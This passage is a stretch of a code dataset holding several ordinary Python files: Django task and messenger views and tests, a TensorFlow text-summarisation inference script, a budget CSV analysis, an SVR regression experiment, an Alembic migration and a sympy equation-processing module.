old loop\n            # reassigned query_set and returned only the last employee's tasks\n            query_set = Task.objects.filter(employee__in = employees)\n            return query_set\n        except Exception as e:\n            print(e)\n\nclass CommentsCreateView(CreateAPIView):\n    serializer_class = CommentsSerializer\n\n    def perform_create(self, serializer):\n        id = self.kwargs.get('id')\n        obj = Task.objects.get(id=id)\n        comment_data = self.request.data.get('comment_text')\n        if comment_data:\n            comment_obj = Comments.objects.create(comment_text=comment_data,\n                created_by=self.request.user, updated_by=self.request.user)\n            obj.comment.add(comment_obj)\n        return obj\n\n# EXCEL CREATION USING SCHEDULER\n# def download_task_xls():\n#     response = HttpResponse(content_type='application/ms-excel')\n#     response['Content-Disposition'] = 'attachment; filename=\"Task - Overview.xls\"'\n#\n#     wb = xlwt.Workbook(encoding='utf-8')\n#     ws = wb.add_sheet('Task')\n#\n#     # Sheet header, first row\n#     row_num = 0\n#\n#     font_style = xlwt.XFStyle()\n#     font_style.font.bold = True\n#     font_style.num_format_str = 'yyyy-mm-dd'\n#\n#     task_obj = Task.objects.all()\n#     header = ['employee_name','title', 'start_date', 'end_date']\n#     columns = header\n#     for col_num in range(len(columns)):\n#         ws.write(row_num, col_num, columns[col_num], font_style)\n#     survey_dict = []\n#\n#     for each in task_obj:\n#         print(each.employee)\n#         survey_dict.append(\n#             {'employee_name':each.employee,'Task': each.title, 'start_date': each.start_date, 'end_date': each.end_date})\n#     task_list = []\n#     for each in survey_dict:\n#         task_list.append(list(each.values()))\n#     task_list_updated = task_list[::-1]\n#     task_list_updated = [[date.strftime(\"%Y-%m-%d %H:%M\") if isinstance(date, datetime.datetime) else date for date in row] for row\n#                          in task_list_updated]\n#     for row in task_list_updated:\n#         row_num += 1\n#         for col_num in range(len(row)):\n#             row[col_num] = strip_tags(row[col_num])\n#             ws.write(row_num, col_num, row[col_num], font_style)\n#     now = datetime.datetime.now()\n#     wb.save('task_sheet_{}.xls'.format(now))\n#     print(response)\n#     
return response\n#\n# schedule.every(1).seconds.do(download_task_xls)\n# # schedule.every().hour.do(download_survey_xls)\n# while True:\n# # Checks whether a scheduled task\n# # is pending to run or not\n# schedule.run_pending()\n# time.sleep(1)\n\n\n\n","sub_path":"taskapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"390762982","text":"#!/usr/bin/env python\n# -*- coding: gbk -*-\n# ==============================================================================\n# \\file predict.py\n# \\author chenghuige \n# \\date 2016-10-19 06:54:26.594835\n# \\Description \n# ==============================================================================\n\n \nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\n#FIXME: attention will hang..., no attention works fine\n#flags.DEFINE_string('model_dir', '/home/gezi/temp/textsum/model.seq2seq.attention/', '')\nflags.DEFINE_string('model_dir', '/home/gezi/temp/textsum/model.seq2seq/', '')\nflags.DEFINE_string('vocab', '/home/gezi/temp/textsum/tfrecord/seq-basic.10w/train/vocab.txt', 'vocabulary file')\nflags.DEFINE_boolean('debug', False, '')\n\nimport sys, os, math\nimport gezi, melt\nimport numpy as np\n\nfrom deepiu.util import text2ids\n\nimport conf \nfrom conf import TEXT_MAX_WORDS, INPUT_TEXT_MAX_WORDS, NUM_RESERVED_IDS, ENCODE_UNK\n\n#TODO: now copy from prpare/gen-records.py\ndef _text2ids(text, max_words):\n word_ids = text2ids.text2ids(text, \n seg_method=FLAGS.seg_method, \n feed_single=FLAGS.feed_single, \n allow_all_zero=True, \n pad=False)\n word_ids = word_ids[:max_words]\n word_ids = gezi.pad(word_ids, max_words, 0)\n\n return word_ids\n\ndef predict(predictor, input_text):\n word_ids = _text2ids(input_text, INPUT_TEXT_MAX_WORDS)\n print('word_ids', word_ids, 'len:', len(word_ids))\n print(text2ids.ids2text(word_ids))\n\n #tf.while_loop has debug problem ValueError: Causality violated in timing relations of debug dumps: seq2seq/main/decode_4/dynamic_rnn_decoder/rnn/while/Merge_7 (1489649052260629): these input(s) are not satisfied: [(u'seq2seq/main/decode_4/dynamic_rnn_decoder/rnn/while/Enter_7', 0), (u'seq2seq/main/decode_4/dynamic_rnn_decoder/rnn/while/NextIteration_7', 0)\n #https://github.com/tensorflow/tensorflow/issues/8337 From your error message, it appears that you are using tf.while_loop. 
Can you try setting its paralle_iterations parameter to 1 and see if the error still happens?\n  #There may be a bug in how tfdbg handles while_loops with parallel_iterations > 1.\n  #I think it might be a GPU thing.\n  #The example below errors if run as python tf_8337_minimal.py but is fine is run as CUDA_VISIBLE_DEVICES=-1 \n  timer = gezi.Timer()\n  text, score = predictor.inference(['text', 'text_score'], \n                                    feed_dict= {\n                                      'seq2seq/model_init_1/input_text:0': [word_ids]\n                                      })\n  \n  for result in text:\n    print(result, text2ids.ids2text(result), 'decode time(ms):', timer.elapsed_ms())\n  \n  timer = gezi.Timer()\n  texts, scores = predictor.inference(['beam_text', 'beam_text_score'], \n                                    feed_dict= {\n                                      'seq2seq/model_init_1/input_text:0': [word_ids]\n                                      })\n\n  texts = texts[0]\n  scores = scores[0]\n  for text, score in zip(texts, scores):\n    print(text, text2ids.ids2text(text), score)\n\n  print('beam_search using time(ms):', timer.elapsed_ms())\n\n\ndef predicts(predictor, input_texts):\n  word_ids_list = [_text2ids(input_text, INPUT_TEXT_MAX_WORDS) for input_text in input_texts]\n  timer = gezi.Timer()\n  texts_list, scores_list = predictor.inference(['beam_text', 'beam_text_score'], \n                                    feed_dict= {\n                                      'seq2seq/model_init_1/input_text:0': word_ids_list\n                                      })\n\n  for texts, scores in zip(texts_list, scores_list):\n    for text, score in zip(texts, scores):\n      print(text, text2ids.ids2text(text), score, math.log(score))\n\n  print('beam_search using time(ms):', timer.elapsed_ms())\n\ndef main(_):\n  text2ids.init()\n  predictor = melt.Predictor(FLAGS.model_dir, debug=FLAGS.debug)\n  \n  #predict(predictor, \"任达华传授刘德华女儿经 赞停工陪太太(图)\")\n  #predict(predictor, \"王凯整容了吗_王凯整容前后对比照片\")\n  #predict(predictor, \"大小通吃汉白玉霸王貔貅摆件 正品开光镇宅招财\")\n  #predict(predictor, \"学生迟到遭老师打 扇耳光揪头发把头往墙撞致3人住院\")\n  #predict(predictor, \"宝宝太胖怎么办呢\")\n  #predict(predictor, \"包邮买二送一性感女内裤低腰诱惑透视蕾丝露臀大蝴蝶三角内裤女夏-淘宝网\")\n  #predict(predictor, \"蛋龟缸,目前4虎纹1剃刀\")\n  #predict(predictor, \"大棚辣椒果实变小怎么办,大棚辣椒果实变小防治措施\")\n  #predict(predictor, \"宝宝太胖怎么办呢\")\n  predict(predictor, \"大棚辣椒果实变小怎么办,大棚辣椒果实变小防治措施\")\n\n  predicts(predictor, [\n    \"包邮买二送一性感女内裤低腰诱惑透视蕾丝露臀大蝴蝶三角内裤女夏-淘宝网\",\n    \"大棚辣椒果实变小怎么办,大棚辣椒果实变小防治措施\",\n    ])\n\nif __name__ == '__main__':\n  tf.app.run()\n","sub_path":"deepiu/textsum/inference/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":5173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"572083718","text":"# importing the file via csv and os\nimport csv\nimport os\ncsvpath = os.path.join('..', 'Resources', 'budget_data.csv') \n\nwith open(csvpath, \"r\") as f:\n reader = csv.reader(f,delimiter = \",\")\n next(reader) # skip the first row\n data = list(reader) # make a list of lists\n row_count = len(data) # count the length of the list of lists\nprint(\"there are\", row_count, \"rows of data, excluding the header\")\n\n# quick test\n# print((data[0][0])) #gives Jan-2010; first list's first item\n# print((data[0][1])) #gives 867884; first list's second item\n\ntotal = 0 # first define total as 0\nfor i in range(0, row_count):\n total = total + int(data[i][1]) #sum through the \"i\"th list's item[1], which is the Profit/Losses values\n\n# calculate the change from month to month\nchange = []\nchange.append(None)\nfor i in range(0, (row_count-1)):\n change.append(int(data[i+1][1]) - int(data[i][1])) # take the value from i+1 month and subtract from i month's profit/losses\n\n# Quick check print(change)\n\n# \"\"\"Yield successive n-sized chunks from l.\"\"\"\n# How many elements each list should have \ndef divide_chunks(l, n): # set up a function that takes requires the l and n parameters\n # looping till length l \n for i in range(0, len(l), n): # for in in range from 0 to length of the \"l\"ist, \n yield l[i: i + n] # from the l list, slice from i to (i+n); not including (i+n)\n\nn = 1 #each list will have 1 elements; this is so we can combine this list with the other one later\nchange_list = list(divide_chunks(change, n)) \n\n# quick check\n# print(change_list)\n\n# take the change_list and flatten it so we can zip it with the original columns of data later\nflat_change_list = []\nfor sublist in change_list:\n for item in sublist:\n flat_change_list.append(item)\n# quick check print(flat_change_list)\n\n# append the flat_change_list to the existing data; essentially adding in the \"third column\", u.e., third item to each list/row\nfor x, y in zip(data, flat_change_list): \n x.append(y)\n\n# quick check\n# print(data)\n# print(data[0])\n# print(len(data)) \n# print(total) #38382578\n# print((data[0][2]))\n\n# calculate the total change by summing up all the month-to-month changes\ntotal_change = 0\nj=0\nfor j in range(1, row_count): #start with 1 instead of 0 because the first change is based on Feb - Jan \n total_change = total_change + data[j][2]\n# quick check\n# print(total_change) # -196785\n\n# calculate the average of the month-to-month change\naverage = round((total_change / (len(data)-1)),2) #len(data)-1 because for Nth months there are Nth-1 changes between months\n# quick check \n# print(len(data)-1) #85\n# print(average) #-2315.12\n\n# determine where the maximum month-to-month change occurs\nmaximum = int(data[1][2])\nj=0\nfor j in range(1, row_count): # start with 1 because the first \"month-to-month\" change is based on Feb (change from Jan)\n if int(data[j][2]) > int(maximum): \n maximum = data[j][2] # the 2-th item in the list (i.e., 3rd) is the change value\n maxrow = j\n maxdate = data[j][0] # the 0-th item in the list (i.e., 1st) is the date when the greatest change occurs\n\n# quick check\n# print(maximum) # 1926159\n# print(maxrow) # 25\n# print(data[maxrow]) # ['Feb-2012', '1170593', 1926159]\n\n# determine when the minimum month-to-month change occurs, i.e., greatest decrease\nminimum = int(data[1][2])\nk=0\nfor k in range(1, row_count):\n if int(data[k][2]) < int(minimum):\n minimum = data[k][2]\n minrow = k\n mindate = data[k][0]\n\n# 
quickcheck\n# print(minimum) # -2196167\n# print(minrow) # 44\n# print(data[minrow]) # ['Sep-2013', '-1196225', -2196167]\n\n# print out the results in the console\nprint(f\"Financial Analyis \\n\\\n---------------------- \\n\\\nTotal Months: {row_count} \\n\\\nTotal: ${total} \\n\\\nAverage change: ${average} \\n\\\nGreatest Increase in Profits: {maxdate} (${maximum}) \\n\\\nGreatest Decrease in Profits: {mindate} (${minimum})\")\n\n# print the results out as a csv file\n# the csvwriter.writerow lines are used to format the .csv file, each \"row\"/list has 4 items.\noutput_path = os.path.join(\"..\", \"Results\", \"PyBank_results.csv\")\n# Open the file using \"write\" mode. Specify the variable to hold the contents\nwith open(output_path, 'w', newline='') as csvfile:\n csvwriter = csv.writer(csvfile, delimiter=',') # Initialize csv.writer\n csvwriter.writerow(['Financial Report', 'Date', 'Unit', 'Value']) # Write the first row (column headers)\n #csvwriter.writerow(['----------------------', '', '', ''])\n csvwriter.writerow(['Total Months', '', '$', row_count])\n csvwriter.writerow(['Total', '', '$', total])\n csvwriter.writerow(['Greatest Increase in Profits', maxdate, '$', maximum])\n csvwriter.writerow(['Greatest Decrease in Profits', mindate, '$', minimum])\nquit()\n","sub_path":"PyBank/Code/main_fullnote.py","file_name":"main_fullnote.py","file_ext":"py","file_size_in_byte":4771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"404607049","text":"from django.test import TestCase\nfrom .views import *\nfrom .models import Message\nfrom django.contrib.auth.models import User\n\n\nclass MessengerTests(TestCase):\n def test_inbox_template(self):\n response = self.client.get('/messenger/inbox/')\n self.assertTemplateUsed(response, 'messenger/inbox.html')\n \n def test_sent_template(self):\n response = self.client.get('/messenger/sent/')\n self.assertTemplateUsed(response, 'messenger/sent.html')\n \n def test_message_does_not_exist(self):\n response = self.client.get('/messenger/message/1')\n self.assertEqual(response.status_code, 404)\n \n def test_view_message_that_exists(self):\n sender = User(username=\"sender\")\n sender.save()\n \n \n \n \n recipient = User(username=\"receiver\")\n recipient.save()\n \n message = Message(\n subject = \"Test Subject\",\n body = \"Test Body\",\n sender = sender,\n recipient = recipient)\n message.save()\n \n response = self.client.get('/messenger/message/1')\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \"messenger/message.html\")\n \n \n def test_post_message(self):\n sender = User.objects.create_user('sender', 'sender@example.com', 'sender')\n recipient = User.objects.create_user('recipient', 'recipient@example.com', 'recipient')\n self.client.login(username=\"sender\", password=\"sender\")\n \n message = {\n \"subject\": \"Test Subject\",\n \"body\": \"Test Body\",\n \"recipient\": recipient.id\n }\n\n response = self.client.post('/messenger/message/compose/', message)\n self.assertEqual(response.status_code, 302) \n \n ","sub_path":"messenger/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"497899665","text":"import sys\n\n# Name;Address;City\nhotel = sys.argv[1] + '\\n'\n\n# Path hotels/hotel_\nfilename = sys.argv[2]\n\noutput = open(filename, 'w')\noutput.write(hotel)\n\nfor i in range(100, 105):\n    s = '2-bedroom;' + str(i) + ';20000\\n'\n    output.write(s)\n\nfor i in range(200,205):\n    s = '3-bedroom;' + str(i) + ';30000\\n'\n    output.write(s)\n\n# range(400,400) is empty and generated no suites; write rooms 400-404\n# to match the five-room pattern above\nfor i in range(400,405):\n    s = 'Suite;' + str(i) + ';50000\\n'\n    output.write(s)\n\noutput.close()\n","sub_path":"vinnsla/data/gen_hotels.py","file_name":"gen_hotels.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"165448265","text":"from cloudify_rest_client.exceptions import CloudifyClientError\nfrom cosmo_tester.framework.fixtures import ( # noqa\n image_based_manager_without_plugins,\n)\n\nmanager = image_based_manager_without_plugins\n\n\ndef test_tenant_creation_no_rabbitmq(manager):\n with manager.ssh() as fabric:\n fabric.sudo('systemctl stop cloudify-rabbitmq')\n\n try:\n manager.client.tenants.create('badtenant')\n assert False, (\n 'Tenant creation should have raised an exception'\n )\n except CloudifyClientError:\n pass\n\n with manager.ssh() as fabric:\n fabric.sudo('systemctl start cloudify-rabbitmq')\n\n # The tenant cannot have been properly created while rabbit was down, so\n # the tenant should not exist\n tenants = manager.client.tenants.list()\n tenant_names = [tenant['name'] for tenant in tenants.items]\n\n assert tenant_names == ['default_tenant']\n","sub_path":"cosmo_tester/test_suites/image_based_tests/tenant_creation_rabbitmq_down.py","file_name":"tenant_creation_rabbitmq_down.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"54934195","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport math\nfrom sklearn.svm import SVR\nfrom sklearn import metrics\nfrom sklearn.model_selection import cross_val_score\nimport pandas as pd\nimport seaborn as sns\nimport pickle\n\ndef main():\n # N_cycles = np.array([20,30,40,50,60,70,80,90,100])\n N_cycles = np.array([ 40])\n\n \n min_rmse = np.zeros(N_cycles.shape)\n min_mpe = np.zeros(N_cycles.shape)\n training_mpe = np.zeros(N_cycles.shape)\n min_percent_error = np.zeros(N_cycles.shape)\n# use_log_cycle_life = False \n use_log_features = True\n use_all_features = False\n which_features = [2,3,4,21,22,24,25,39,40,48,49,63,65]#list(map(int, np.linspace(2,12,11) ))\n \n best_C = np.zeros(N_cycles.shape)\n best_eps = np.zeros(N_cycles.shape) \n trained_models = []\n \n for i in np.arange(len(N_cycles)):\n print('Starting N_cycles = ' + str(int(N_cycles[i])))\n \n if use_log_features:\n file_name = \"training/Cycles_2TO\" + str(int(N_cycles[i])) + \"_log.csv\"\n else:\n file_name = \"training/Cycles_2TO\" + str(int(N_cycles[i])) + \".csv\"\n\n features, cycle_lives, feature_names = load_dataset(file_name, False, use_all_features, which_features)\n \n # make some arrays that depend on number of features\n if i == 0:\n norm_coeffs = np.zeros([features.shape[1],len(N_cycles)])\n\n# from sklearn import svm\n# X = [[0, 0], [2, 2]]\n# y = [0.5, 2.5] \n# clf = svm.SVR()\n# clf.fit(X, y) \n# clf.predict([[1, 1]])\n# \n\n# C = np.array([1000]) #np.linspace(1,1000,50)\n# C = np.linspace(1,100000,50)\n C = np.logspace(0,6,8)\n eps = np.logspace(-2.5,-0.5,6)\n\n rmse = np.zeros([len(C),len(eps)]) \n train_rmse = np.zeros([len(C),len(eps)])\n mpe = np.zeros([len(C),len(eps)]) \n\n\n \n for j in np.arange(len(C)):\n for k in np.arange(len(eps)):\n # SVR\n # my_SVR = sk.svm.SVR(kernel='rbf', degree=3, gamma='auto_deprecated', coef0=0.0, tol=0.001, C=1.0, epsilon=0.1, shrinking=True, cache_size=200, verbose=False, max_iter=1000)\n my_SVR = SVR(kernel='rbf',C=C[j], epsilon=eps[k])\n print('C = ' + str(C[j]))\n print('eps = ' + str(eps[k]))\n \n# if use_log_cycle_life:\n# my_SVR.fit(features,np.log10(cycle_lives))\n# predicted_cycle_lives = 10**my_SVR.predict(features)\n# residuals = predicted_cycle_lives - cycle_lives\n# train_rmse[j,k] = np.sqrt(((residuals) ** 2).mean())\n## R_squared = my_SVR.score(features,np.log10(cycle_lives))\n# mse = cross_val_score(my_SVR, features, np.log10(cycle_lives), cv=5, scoring='mean_squared_error')\n# rmse[j,k] = np.sqrt(np.mean(mse))\n# next_mpe = cross_val_score(my_SVR, features, np.log10(cycle_lives), cv=5, scoring=mean_percent_error)\n# mpe[j,k] = np.mean(next_mpe)\n# else:\n my_SVR.fit(features,cycle_lives)\n predicted_cycle_lives = my_SVR.predict(features)\n residuals = predicted_cycle_lives - cycle_lives\n train_rmse[j,k] = np.sqrt(((residuals) ** 2).mean())\n# R_squared = my_SVR.score(features,cycle_lives)\n mse = -cross_val_score(my_SVR, features, cycle_lives, cv=5, scoring='neg_mean_squared_error')\n rmse[j,k] = np.sqrt(abs(np.mean(mse)))\n next_mpe = cross_val_score(my_SVR, features, np.log10(cycle_lives), cv=5, scoring=mean_percent_error)\n mpe[j,k] = np.mean(next_mpe)\n \n plt.plot(cycle_lives,predicted_cycle_lives,'o')\n plt.plot([0,2400],[0,2400],'r-')\n plt.ylabel('Predicted cycle lives')\n plt.xlabel('Actual cycle lives')\n #plt.axis('equal')\n plt.axis([0, 1400, 0, 1400])\n plt.show()\n \n \n print('Training error:')\n print(train_rmse[j,k])\n \n print('RMSE with cross validation:')\n print(rmse[j,k])\n\n print('MPE 
with cross validation:')\n print(mpe[j,k])\n \n \n # print('N iterations to convergence: ' + str(int(enet.n_iter_)))\n# print('R_square = ' + str(R_squared))\n print('Finished N_cycles = ' + str(int(N_cycles[i])))\n print('=======================================')\n\n \n print('Min RMSE with cross validation:')\n print(np.min(rmse)) \n \n print('Min MPE with cross validation:')\n print(np.min(mpe)) \n \n min_rmse[i] = np.min(rmse)\n min_mpe[i] = np.min(mpe)\n# best_index = np.where(mpe==np.min(mpe))\n# best_C[i] = C[best_index[0]]\n# best_eps[i] = eps[best_index[1]]\n index_best = np.argmin(rmse)\n best_C_index = index_best // eps.shape[0]\n print('Best C index ' + str(int(best_C_index)))\n best_C[i] = C[best_C_index]\n \n best_eps_index = np.mod(index_best, eps.shape[0])\n print('Best eps index ' + str(int(best_eps_index)))\n best_eps[i] = eps[best_eps_index]\n\n print('Best eps:')\n print(best_eps[i])\n print('Best C:')\n print(best_C[i])\n \n print('Training MSE:')\n ax = sns.heatmap(train_rmse)\n plt.show()\n print('Cross-validation MSE:')\n ax = sns.heatmap(rmse)\n plt.show()\n print('Cross-validation MPE:')\n ax = sns.heatmap(mpe)\n plt.show()\n \n # Train new model using best hyperparameters:\n best_SVR = SVR(kernel='rbf',C=best_C[i], epsilon=best_eps[i])\n best_SVR.fit(features,cycle_lives)\n trained_models.append(best_SVR)\n \n predicted_cycle_lives = best_SVR.predict(features)\n residuals = predicted_cycle_lives - cycle_lives\n training_mpe[i] = (np.abs(residuals)/cycle_lives).mean()*100\n \n plt.plot(cycle_lives,predicted_cycle_lives,'o')\n plt.plot([0,2400],[0,2400],'r-')\n plt.ylabel('Predicted cycle lives')\n plt.xlabel('Actual cycle lives')\n #plt.axis('equal')\n plt.axis([0, 1400, 0, 1400])\n plt.show()\n \n # make nice plots\n plt.plot(N_cycles, min_rmse, '-o')\n plt.ylabel('RMSE error')\n plt.xlabel('N cycles')\n plt.show()\n \n plt.plot(N_cycles, min_mpe, '-o')\n plt.ylabel('MPE error')\n plt.xlabel('N cycles')\n plt.show()\n\n# plt.subplot(2, 1, 1)\n# plt.plot(N_cycles, optimal_l1_ratio, '-o')\n# plt.ylabel('Optimal L1 ratio')\n# plt.xlabel('N cycles')\n# \n# plt.subplot(2, 1, 2)\n# plt.plot(N_cycles, optimal_alpha, '-o')\n# plt.ylabel('Optimal alpha')\n# plt.xlabel('N cycles')\n# plt.show()\n \n # export coeff matrix to csv\n# df = pd.DataFrame(norm_coeffs, columns=N_cycles, index=feature_names)\n# df.to_csv(\"norm_coeffs.csv\")\n \n \n pickle.dump(trained_models, open('SVR_trained_models.pkl', 'wb'))\n pickle.dump(min_mpe, open('SVR_crossvalid_percenterror.pkl', 'wb')) \n pickle.dump(training_mpe, open('SVR_training_percenterror.pkl', 'wb')) \n\n \n\n \n \ndef load_dataset(csv_path, add_intercept=True, use_all_features=True, which_features=[2]):\n \"\"\"Load dataset from a CSV file.\n\n Args:\n csv_path: Path to CSV file containing dataset.\n add_intercept: Add an intercept entry to x-values.\n\n Returns:\n xs: Numpy array of x-values (features).\n ys: Numpy array of y-values (labels).\n headers: list of headers\n \"\"\"\n\n # def add_intercept_fn(x):\n # global add_intercept\n # return add_intercept(x)\n\n # # Validate label_col argument\n # allowed_label_cols = ('y', 't')\n # if label_col not in allowed_label_cols:\n # raise ValueError('Invalid label_col: {} (expected {})'\n # .format(label_col, allowed_label_cols))\n\n # Load headers\n with open(csv_path, 'r') as csv_fh:\n headers = csv_fh.readline().strip().split(',')\n\n # Load features and labels\n # x_cols = [i for i in range(len(headers)) if headers[i] == 'cycle_lives']\n # l_cols = [i for i in 
range(len(headers)) if headers[i] == label_col]\n if use_all_features:\n features = np.loadtxt(csv_path, delimiter=',', skiprows=1, usecols=range(2, len(headers)))\n else:\n features = np.loadtxt(csv_path, delimiter=',', skiprows=1, usecols=which_features)\n cycle_lives = np.loadtxt(csv_path, delimiter=',', skiprows=1, usecols=[1])\n feature_names = headers[2:len(headers)]\n\n m = features.shape[0]\n # print(m)\n # print(features.shape)\n # print( np.ones([m, 1]))\n if add_intercept:\n features = np.concatenate((np.ones([m, 1]), features),axis=1)\n feature_names = ['intercept'] + feature_names\n\n return features, cycle_lives, feature_names\n\n\ndef mean_percent_error(model, X, y):\n predicted_y = model.predict(X)\n residuals = predicted_y - y\n return (np.abs(residuals)/y).mean()*100\n\n \n\n\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"old/very_old/SVR_peter.py","file_name":"SVR_peter.py","file_ext":"py","file_size_in_byte":9345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"444055251","text":"\"\"\"Add channel.template column\n\nRevision ID: 172a7254c12b\nRevises: 052c03de63d0\nCreate Date: 2020-05-09 12:36:25.400317\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '172a7254c12b'\ndown_revision = '052c03de63d0'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column(\n 'channels',\n sa.Column('template', sa.Text(), server_default='', nullable=False),\n )\n\n\ndef downgrade():\n op.drop_column('channels', 'template')\n","sub_path":"migrations/versions/2020-05-09_12:36_add_channel_template_column.py","file_name":"2020-05-09_12:36_add_channel_template_column.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"90870822","text":"import json\n\n# Load the parcels GeoJSON (must be opened for reading; mode 'w' would\n# truncate the file before json.load could read it)\nwith open('Parcels_2016_Data_Full.geojson', 'r') as geojson_file:\n    data = json.load(geojson_file)\n    # data is now a dict,\n    # you can do whatever you want with it\n\n\n# Alternative pandas/CSV approach, kept commented out:\n# import pandas as pd\n# import numpy as np\n#\n# fields = ['OBJECTID','PTYPE','U_NUM_PARK','GIS_ID','FULL_ADDRESS','SHAPESTArea','SHAPESTLength']\n# df = pd.read_csv('Parcels_2016_Data_Full.csv', delimiter=',', usecols=fields)\n#\n# for prop in df.PTYPE:\n#     if prop>=0 and prop<200:\n#         df.drop([0, 1])\n# for parking in df.U_NUM_PARK:\n#     pass\n#\n# print(df)\n","sub_path":"extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"404491562","text":"\nimport logging\nimport sympy as sp\nimport numpy as np\nfrom .exceptions import SymbolicException\n\nlogger = logging.getLogger(__name__)\n\n\nclass NotInvertible(Exception):\n pass\n\n\ndef extract_coefficients(equation, local_map, global_coords):\n\n coeff_dict = {}\n nonlinear_terms = sp.S(0)\n subs = [(k, global_coords[v]) for k, v in local_map.items()]\n\n subs.sort(key=lambda x: str(x[1])[-1], reverse=True)\n logger.info(\"Extracting coefficients from %s\", repr(equation))\n logger.info(\"Using local-to-global substitutions %s\", repr(subs))\n\n terms = equation.expand().args\n if not terms:\n if equation in local_map:\n coeff_dict[local_map[equation]] = sp.S(1)\n else:\n nonlinear_terms = equation\n else:\n for term in terms:\n factors = list(flatten(term.as_coeff_mul()))\n logger.info(\"Factors: %s\", repr(factors))\n coeff = sp.S(1)\n base = []\n while factors:\n factor = factors.pop()\n if factor.is_number:\n coeff *= factor\n else:\n base.append(factor)\n logger.info(\"Base: %s\", repr(base))\n if len(base) == 1 and base[0] in local_map:\n coeff_dict[local_map[base[0]]] = coeff\n else:\n new_term = term\n new_term = new_term.subs(subs)\n nonlinear_terms = sp.Add(new_term, nonlinear_terms)\n\n logger.info(\"Linear terms: %s\", repr(coeff_dict))\n logger.info(\"Nonlinear terms: %s\", repr(nonlinear_terms))\n\n return coeff_dict, nonlinear_terms\n\n\ndef _generate_substitutions(linear_op, nonlinear_op, constraints, coords, size_tup):\n\n # Lx + F(x) = 0 => Ix = (I - L)x - F(x) = Rx - F(x)\n # Since L is in smith normal form (rref and square)\n # If (Rx)_{ii} = 0, and F(x)_i doesn't depend upon x_i\n # then we have x_i = (Rx)_i - F_i(x)\n c_atoms = set(coords)\n atoms = nonlinear_op.atoms() & c_atoms\n for constraint in constraints:\n atoms |= (constraint.atoms() & c_atoms)\n\n if not atoms:\n logger.info(\"No substitutions required\")\n return []\n\n Rx = (sp.eye(linear_op.rows) - linear_op)\n\n ss_size, js_size, cv_size, n = size_tup\n substitutions = []\n for i in reversed(range(2*(ss_size + js_size))):\n co = coords[i]\n if Rx[i,i] == 0 and co in atoms and not co in nonlinear_op[i].atoms():\n\n eqn = Rx[i,:].dot(coords) - nonlinear_op[i]\n pair = (coords[i], eqn)\n logger.info(\"Generating substition %s = %s\",\n repr(coords[i]), repr(eqn))\n substitutions = [\n (c, s.subs(*pair)) for c, s in substitutions\n ]\n substitutions.append(pair)\n\n return substitutions\n\n\ndef _process_constraints(linear_op,\n nonlinear_op,\n constraints,\n coordinates,\n size_tup):\n\n initial_constraints = []\n ss_size, js_size, cv_size, n = size_tup\n offset = 2 * js_size + ss_size\n\n coord_atoms = set(coordinates[0:offset+ss_size])\n cv_constraints = [\n linear_op[i,:].dot(coordinates) + nonlinear_op[i,0]\n for i in range(offset+ss_size, n)\n ]\n constraints += [cons for cons in cv_constraints if cons]\n linear_op = linear_op[:offset+ss_size, :]\n nonlinear_op = nonlinear_op[:offset+ss_size, :]\n\n while constraints:\n constraint, _ = sp.fraction(constraints.pop())\n logger.info(\"Processing constraint: %s\",repr(constraint))\n atoms = constraint.atoms() & set(coord_atoms)\n\n # todo: check to see if we can solve f(x) = u => g(u) = x\n if len(atoms) == 1:\n c = atoms.pop()\n logger.info(\"Attempting to find inverse\")\n solns = list(sp.solveset(constraint, c))\n if len(solns) == 1:\n idx = coordinates.index(c)\n sol = solns.pop()\n\n linear_op = linear_op.col_join(\n sp.SparseMatrix(1, linear_op.cols, {(0, idx): 1})\n )\n nonlinear_op = nonlinear_op.col_join(\n 
sp.SparseMatrix(1, 1, {(0,0): -sol})\n )\n constraint = c - sol\n else:\n logger.warning(\"..skipping %s\", repr(constraint))\n initial_constraints.append(constraint)\n try:\n partials = [constraint.diff(c) for c in coordinates]\n except Exception as ex:\n logger.exception(\"Could not differentiate %s with respect to %s\",\n repr(constraint),repr(coordinates)\n )\n raise ex\n\n if any(p != 0 for p in partials[0:offset]):\n logger.warning(\"Cannot yet reduce order of %s\", repr(constraint))\n initial_constraints.append(constraint)\n else:\n ss_derivs = partials[offset: offset + ss_size]\n cv_derivs = partials[offset + ss_size:]\n factor = 0\n lin_dict = {}\n nlin = 0\n for idx, coeff in enumerate(ss_derivs):\n if factor == 0 and coeff != 0:\n factor = 1 / coeff\n lin_dict.update({(0, idx): 1})\n elif factor != 0 and coeff != 0:\n new_coeff = sp.simplify(coeff / factor)\n if new_coeff.is_number:\n lin_dict.update({(0, idx): new_coeff})\n else:\n nlin += new_coeff * coordinates[idx]\n if factor == 0:\n raise SymbolicException(\"Invalid Constraint %s\",\n repr(constraint))\n for idx, coeff in enumerate(cv_derivs):\n if coeff != 0:\n cv = 